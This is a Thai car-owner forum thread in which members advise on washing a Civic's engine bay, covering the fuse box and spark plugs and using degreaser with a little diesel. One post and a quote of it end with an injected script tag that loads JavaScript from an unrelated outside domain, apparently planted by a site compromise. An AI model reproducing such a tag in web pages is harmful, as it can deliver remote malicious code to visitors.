ตอบ
จร ซีวิค อีเอส

ชื่อเล่น: จร

เข้าร่วม: 12 กุมภา 2016
ตอบ: 70

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 32
ให้คำขอบคุณ: 769

ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 3 ตุลา 2016 10:21 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
อยากทราบว่า การล้างห้องเครื่องใช้น้ำเปล่าธรรมดาได้ใหมครับ และต้องระวังจุดใหนเป็นพิเศษบ้างครับ เช่นไดชาร์ต กล่องฟิวล์ แบต อยากลองล้างเองดูครับแต่ยังไม่เคยล้าง พี่ๆท่านใดเคยล้างหรือมีประสบณ์การณ์อะไรมาบ้างช่วยแนะนำหน่อยครับ

Attached File :
สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 ตุลา 2016 11:00 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
ใช้ถุงพลาสติกคลุมกล่องฟิวครับ

ส่วนคอล์ย ถอยใช้ลมเป่าไล่ความลื่น แล้วฉีดน้ำมันครอบจักวาลครับ

ได้รับคำขอบคุณจาก: Mongkol Seedaduang 

สมาชิกสับสน
สมาชิกสับสน

สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 3 ตุลา 2016 11:08 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
aumlight พิมพ์ว่า:

ส่วนคอล์ย ถอยใช้ลมเป่าไล่ความลื่น แล้วฉีดน้ำมันครอบจักวาลครับ

แล้วแบตกับไดชาร์ตล่ะครับ ไปเป็นอะไรใช่ใหมครับ
ได้รับคำขอบคุณจาก: aumlight 
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 ตุลา 2016 12:16 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
Mongkol Seedaduang พิมพ์ว่า:

แล้วแบตกับไดชาร์ตล่ะครับ ไปเป็นอะไรใช่ใหมครับ

ผมไม่ได้คลุมนะ แต่เพื่อความสบายใจคลุมก็ได้ครับ

ผมสดๆ แบบนี้เลย
v
v
v
v

Attached File :
สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
ได้รับคำขอบคุณจาก: Mongkol Seedaduang  popza4 

สมาชิกสับสน
สมาชิกสับสน

จันทร์, 3 ตุลา 2016 12:20 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง

ผมไม่ได้คลุมนะ แต่เพื่อความสบายใจคลุมก็ได้ครับ

v
v
v
v

ขอบคุณครับ
ได้รับคำขอบคุณจาก: aumlight 
Keng Keng Hatee

ชื่อเล่น: เก่งครับ

เข้าร่วม: 16 สิงหา 2015
ตอบ: 178

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 51
ให้คำขอบคุณ: 0

อังคาร, 4 ตุลา 2016 00:21 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
ผมล้างเลยนะ ไม่ได้คลุม เอาน้ำฉีดเลย แห้งก็เอาครีบขัดให้เงา<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Mongkol Seedaduang 
yo_krab

ชื่อเล่น: แก่งคอย

เข้าร่วม: 03 ตุลา 2011
ตอบ: 377

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 264
ให้คำขอบคุณ: 55

อังคาร, 4 ตุลา 2016 07:32 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง

v
v
v
v

ใจถึงมากๆฮะ...

aaa_333

เข้าร่วม: 11 มิถุนา 2015
ตอบ: 32

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 2
อังคาร, 4 ตุลา 2016 09:01 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
จุดที่ต้องคลุม ก็คือกล่องฟิวส์ หัวเทียน ส่วนการล้าง ก็แนะนำน้ำยาล้างห้องเครื่องเชียงกง ผสมกับ น้ำมันดีเซล เล็กน้อย เพื่อการละลายคราบน้ำมันที่เปื้อนตามซอกเล็กซอกน้อยได้ดีครับ (ไม่แนะนำผสมน้ำมันเบนซิลนะครับ เพราะมันจะกัดชิ้นส่วนที่เป็นพลาสติกอาจทำให้เกิดรอยด่างได้) จากนั้นก็ล้างด้วยน้ำยาล้างรถ ต่อมาก็เช็ดให้แห้ง แล้วก็ลงน้ำยาเคลือบบางๆนะครับ เพราะถ้าลงหนาฝุ่นถามหาเพียบ แค่นี้ก็จบการล้างห้องเครื่องแล้วครับ

สมาชิกสับสน
สมาชิกสับสน

อังคาร, 4 ตุลา 2016 09:10 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
aaa_333 พิมพ์ว่า:
จุดที่ต้องคลุม ก็คือกล่องฟิวส์ หัวเทียน ส่วนการล้าง ก็แนะนำน้ำยาล้างห้องเครื่องเชียงกง ผสมกับ น้ำมันดีเซล เล็กน้อย เพื่อการละลายคราบน้ำมันที่เปื้อนตามซอกเล็กซอกน้อยได้ดีครับ (ไม่แนะนำผสมน้ำมันเบนซิลนะครับ เพราะมันจะกัดชิ้นส่วนที่เป็นพลาสติกอาจทำให้เกิดรอยด่างได้) จากนั้นก็ล้างด้วยน้ำยาล้างรถ ต่อมาก็เช็ดให้แห้ง แล้วก็ลงน้ำยาเคลือบบางๆนะครับ เพราะถ้าลงหนาฝุ่นถามหาเพียบ แค่นี้ก็จบการล้างห้องเครื่องแล้วครับ

ขอบคุณครับ

สมาชิกสับสน
สมาชิกสับสน

อังคาร, 4 ตุลา 2016 09:12 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
Keng Keng Hatee พิมพ์ว่า:
ผมล้างเลยนะ ไม่ได้คลุม เอาน้ำฉีดเลย แห้งก็เอาครีบขัดให้เงา<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ผมกลัวระบบไฟครับ กลัวมันจะช็อตไม่มันใจรถตัวเองครับ
Keng Keng Hatee

ชื่อเล่น: เก่งครับ

เข้าร่วม: 16 สิงหา 2015
ตอบ: 178

ได้รับคำขอบคุณ: 51
ให้คำขอบคุณ: 0

อังคาร, 4 ตุลา 2016 13:42 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
Keng Keng Hatee พิมพ์ว่า:

ผมกลัวระบบไฟครับ กลัวมันจะช็อตไม่มันใจรถตัวเองครับ

ล้างที่ คาร์แคร์ยิ่งเอาที่ฉีดล้างที่แรงๆน่ะ ฉีดเลย ผมก็ไปล้างตลอด ก้ไม่เคยมีปัญหาเรื่องระบบไฟนะครับ
ake_farlikit

ชื่อเล่น: เอก

เข้าร่วม: 20 ธันวา 2014
ตอบ: 549

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 794
ให้คำขอบคุณ: 3566

สี: แดง รอยัล รูบี้ (มุก) (R-522P)
ศุกร์, 26 มกรา 2018 01:23 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง

ได้รับคำขอบคุณจาก: molsin  Mongkol Seedaduang 

สมาชิกสับสน
สมาชิกสับสน

จันทร์, 28 พฤษภาคม 2018 12:58 - สอบถามครับ เกี่ยวกับการล้างห้องเครื่อง
ake_farlikit พิมพ์ว่า:

ขอบคุณครับพี่
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.